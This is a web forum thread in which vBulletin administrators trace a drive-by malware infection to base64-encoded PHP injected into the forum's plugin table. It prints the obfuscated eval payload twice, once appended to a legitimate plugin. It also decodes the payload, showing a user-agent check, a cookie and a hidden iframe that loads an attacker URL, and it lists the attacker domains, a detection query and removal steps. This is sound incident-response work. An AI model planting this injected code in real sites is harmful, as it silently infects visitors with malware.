I have noticed in the last few days my VB install has been trying to infect users with a trojan coming from bekebu.in &/or cuzelu.in

http://support.clean-mx.de/clean-mx/viruses.php?domain=bekebu.in&submit=query

not sure if this was a new 0 day going around or not, but it may be worth someones time to look into this.

:eek:

--------------- Added 1277395487 at 1277395487 ---------------

I have blocked out the /16 that those domains are coming from and google safebrowsing doesn't come up with the malware warning anymore.

91.188.0.0/16

http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.188.59.55&submit.x=0&submit.y=0&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55

http://www.senderbase.org/senderbase_queries/detailip?search_string=91.188.59.55

What file is calling that site?

I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.

\r\n@eval(base64_decode(\"aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID 0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94Jywn T3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ0 1lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwx MTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby 5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7 DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF 9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQpl Y2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2 tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBj b29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYX RlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGlt ZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYX RlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNv b2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3 BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIr ZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Ii k7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIg d2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZn JhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2lu aGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSj sNCmJyZWFrOw0KIH0NCiB9DQp9\"));

which resulted in

if (!isset($_COOKIE['xlov'])) {
$xb = array('MSIE','MyIE','IE','Firefox','Opera','Netsca pe','Chrome','Safari','Media Center');
$ifrand = mt_rand(0,111);
$domb = "http: // www. fealatoc.co .cc/clo.php";
foreach ($xb as $xbb) {
if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) {
echo <<<HJJ
<script>
function SetCookie(cookieName,cookieContent){
var cookiePath = '/';
var expDate=new Date();
expDate.setTime(expDate.getTime()+372800000) ;
var expires=expDate.toGMTString();
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
SetCookie("xlov", "day");
</script>
<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>
HJJ;
break;
}
}
}

--------------- Added 1277566093 at 1277566093 ---------------

the url in the script code is broken on purpose

--------------- Added 1277566152 at 1277566152 ---------------

Thanks to the people over at Tapatalk for helping me figure this out. :wink:

you're running Tapatalk on your vB? or is it just a clean install of vB?

We have been using tapatalk for a while now. Last week a few members started getting virii warnings about bekebu.in &/or cuzelu.in. A few days ago, one the admins @ tapatalk contacted us to let us know they had shut us down on their side due to the virii issue and have helped us locate some of this code.

--------------- Added 1277640262 at 1277640262 ---------------

fealatoc . co . cc info:

http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.216.122.7&submit.x=0&submit.y=0&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7

Post Thanks 'Hack' got hacked.

Also Reported to PT author @ https://vborg.vbsupport.ru/showpost.php?p=2060447&postcount=948

I guess the question is- did having tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have tapatalk installed I'm curious too.

Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the tapatalk plugin. I think it's the post thanks `hack` that is vulnerable, but this will need to be tested and confirmed.

I am not sure either, the information are mixed, some forum didn't install Tapatalk also got hacked. But one forum found a mysterious php file are added to the Tapatalk directory that caught our attention. So we went ahead to check our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).

We have sent out email to all forum owners to upgrade so I hope to keep this infection to the minimum.

Your screenshot in https://vborg.vbsupport.ru/showpost.php?p=2060449&postcount=6 shows a Thank You plugin at the global_setup_complete hook.

There is no Thank You plugin that's using that hook.

To blame the Thank You hack for this seems misguided. You were hacked by tapatalk. Lord knows what else got corrupted in the process.

I would like to thank someDude-GP for posting that code. I have been dealing with this issue for a week on my site. You may have just helped me find this code.

I had deleted my tapatalk directory so I didn't have a possible roadmap to where they placed that code.

Searching my datastore table just now it appears that they inserted it in one of my plugins.

This is as far as I have gotten, but I am very encouraged to find a match to the code you posted.
THANK YOU. I owe you some beers.

caliman

--------------- Added 1277699440 at 1277699440 ---------------

In my case it was the 'Members who visted today' plugin that got infected.

The global_start hook:

if ($show['wvt'])
{
if ($vbulletin->options['wvt24'])
{
$cutoff = TIMENOW - 86400;
$whodesc = $vbphrase['wvt_visited_today_24'];
}
else
{
$whodesc = $vbphrase['wvt_visited_today'];
$tnow = date('YmdHis',TIMENOW - intval($vbulletin->options['hourdiff']));
$cutoff = TIMENOW - (substr($tnow,8,2)*3600 + substr($tnow,10,2)*60 + substr($tnow,12,2));
}

unset ($whotoday);
$show['loggedinusers'] = true;

if ($vbulletin->options['wvtnames'])
{
$todaysusers = $vbulletin->db->query_read_slave("
SELECT * FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity)
WHERE lastactivity > $cutoff ORDER BY username
");

$totaltoday = 0;
while ($today = $vbulletin->db->fetch_array($todaysusers))
{
$totaltoday += 1;
$today['markinv'] = '';
$today[visible] = true ;
if ($today['options'] & $vbulletin->bf_misc_useroptions['invisible'])
{
$today['visible'] = false ;
if (($vbulletin->userinfo['permissions']['genericpermissions']
& $vbulletin->bf_ugp_genericpermissions['canseehidden'])
OR $today['userid'] == $vbulletin->userinfo['userid'])
{
$today['markinv'] = '*';
$today['visible'] = true ;
}
}
if ($today['visible'])
{
$ugroup = ($today['displaygroupid'] > 0 ? $today['displaygroupid'] : $today['usergroupid']);
$today['opentag'] = $vbulletin->usergroupcache[$ugroup]['opentag'];
$today['closetag'] = $vbulletin->usergroupcache[$ugroup]['closetag'];
$today['wrdate'] = vbdate($vbulletin->options['timeformat'], $today['lastactivity']);
eval('$whotoday .= "' . fetch_template('Display_Visitors_User') . '" . ", ";');
}
}

if ($whotoday)
{
$whotoday = substr($whotoday, 0, -2);
}
else
{
$whotoday = $vbphrase['wvt_no_visitors'];
}
}
else
{
$todaysusers = $vbulletin->db->query_first_slave("
SELECT COUNT(lastactivity) AS whotoday
FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity)
WHERE lastactivity > $cutoff
");

$totaltoday = $todaysusers['whotoday'];
$whotoday = $vbphrase['wvt_no_visitors_display'];
}

if ($vbulletin->options['wvtcol'])
{
$vbcollapse['collapseimg_forumhome_todayusers'] = '_collapsed';
$vbcollapse['collapseobj_forumhome_todayusers'] = 'display:none;';
}

$ftotaltoday = vb_number_format($totaltoday);
$whotitle = construct_phrase($whodesc,$ftotaltoday);

$pid = 'paulm_wvt_37';
if ($pemdata37['set'] == true)
{
$data_wvt =& $pemdata37[$pid];
}
else
{
if ($pemdata37 = unserialize($vbulletin->options['pemdata37']))
{
$pemdata37['set'] = true;
$data_wvt =& $pemdata37[$pid];
}
else
{
$data_wvt = array('version' => 'N/A');
}
}

if ($vbulletin->options['enable_wvt'])
{
$vbulletin->templatecache["{$vbulletin->options['template_wvt']}"] = str_replace($vbulletin->options['text_wvt'],
$vbulletin->options['text_wvt'].$vbulletin->templatecache['Display_Visitors'],$vbulletin->templatecache["{$vbulletin->options['template_wvt']}"]);
}

if ($vbulletin->options['wvtmost'])
{
if (empty($vbulletin->maxloggedin))
{
if (method_exists($vbulletin->datastore,'do_fetch'))
{ // Datastore extension exists, use it
$vbulletin->datastore->do_fetch('maxloggedin',$errors);
if ($errors[0])
{ // Fetch failed, use original datastore
$vbulletin->datastore->do_db_fetch("'maxloggedin'");
}
}
else
{ // No extension, use original datastore
$vbulletin->datastore->do_db_fetch("'maxloggedin'");
}
}

if ($totaltoday > intval($vbulletin->maxloggedin['maxvisitors']))
{
$vbulletin->maxloggedin['maxvisitorsdate'] = TIMENOW;
$vbulletin->maxloggedin['maxvisitors'] = $totaltoday;
build_datastore('maxloggedin', serialize($vbulletin->maxloggedin),1);

}

if ($vbulletin->options['wvtmost'])
{
if ($vbulletin->options['wvt24'])
{
$description = $vbphrase['wvt_members_24'];
}
else
{
$description = $vbphrase['wvt_members_day'];
}

$visitors = construct_phrase(
$description, vb_number_format($vbulletin->maxloggedin['maxvisitors']),
vbdate( $vbulletin->options['dateformat'], $vbulletin->maxloggedin['maxvisitorsdate'], true ),
vbdate( $vbulletin->options['timeformat'], $vbulletin->maxloggedin['maxvisitorsdate'] )
);

$whotoday = $visitors . "<br />" . $whotoday;
}
}
}
@eval(base64_decode("aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID 0gYXJyYXkoJ01TSUUnLCdNeUlF
JywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0 Nocm9tZScsJ1NhZmFyaScsJ01l
ZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMT EpOw0KJGRvbWIgPSAiaHR0cDov
L3d3dy5nZXR0aWFvLmNvLmNjL3BsLnBocCI7DQpmb3JlYWNoIC gkeGIgYXMgJHhiYikgew0KaWYo
c3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFUl 9BR0VOVCddKSxzdHJ0b2xvd2Vy
KCR4YmIpKSkgew0KJGRldmIgPSA8PDxISkoNCjxzY3JpcHQ+DQ pmdW5jdGlvbiBTZXRDb29raWUo
Y29va2llTmFtZSxjb29raWVDb250ZW50KXsNCiB2YXIgY29va2 llUGF0aCA9ICcvJzsNCiB2YXIg
ZXhwRGF0ZT1uZXcgRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZS hleHBEYXRlLmdldFRpbWUoKSsz
NzI4MDAwMDApICA7DQogdmFyIGV4cGlyZXM9ZXhwRGF0ZS50b0 dNVFN0cmluZygpOw0KIGRvY3Vt
ZW50LmNvb2tpZT1jb29raWVOYW1lKyI9Iitlc2NhcGUoY29va2 llQ29udGVudCkrIjtwYXRoPSIr
ZXNjYXBlKGNvb2tpZVBhdGgpKyI7ZXhwaXJlcz0iK2V4cGlyZX M7IA0KfQ0KU2V0Q29va2llKCJ4
bG92IiwgImRheSIpOw0KPC9zY3JpcHQ+DQo8aWZyYW1lIG5hbW U9IiRpZnJhbmQiIHdpZHRoPSIx
IiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZyYW1lYm9yZG VyPSJubyIgbWFyZ2lud2lkdGg9
IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSIkZG9tYiI+PC9pZn JhbWU+DQpISko7DQpicmVhazsN
CiB9DQogfQ0KfQ=="));


Uninstalling the plugin did the trick. This also rebuilds the datastore.

You can search your database to look for this code by doing this:
SELECT * FROM plugin WHERE phpcode LIKE "%base64_decode%";

This should give you a result with the code and you can figure out which plugin it is in. You can verify through plugin manager. Then uninstall that plugin. That will remove this exploit and rebuild datastore. Reinstall plugin if you want after that.

Hope this helps someone. This has been absolutely brutal.

caliman

Glad I could help you find that code caliman :)

djbaxter: The Post thanks mod was only a guess. I have way too many things going on to really dig into it very much. I did notice that the tapatalk plugin was updated on 06/25/2010 though.

--------------- Added 1277730343 at 1277730343 ---------------

What i did was go into plugins & products --> product manager. then i found the part of the plugin that had the code and just deleted the code

Thanks again. I was serious about the beer.
I have confirmed that this removed the exploit from my site.

Thanks to both of you. While my forum wasn't showing any symptoms, I did the search using phpMyAdmin and verified that the exploit was not present on my forums.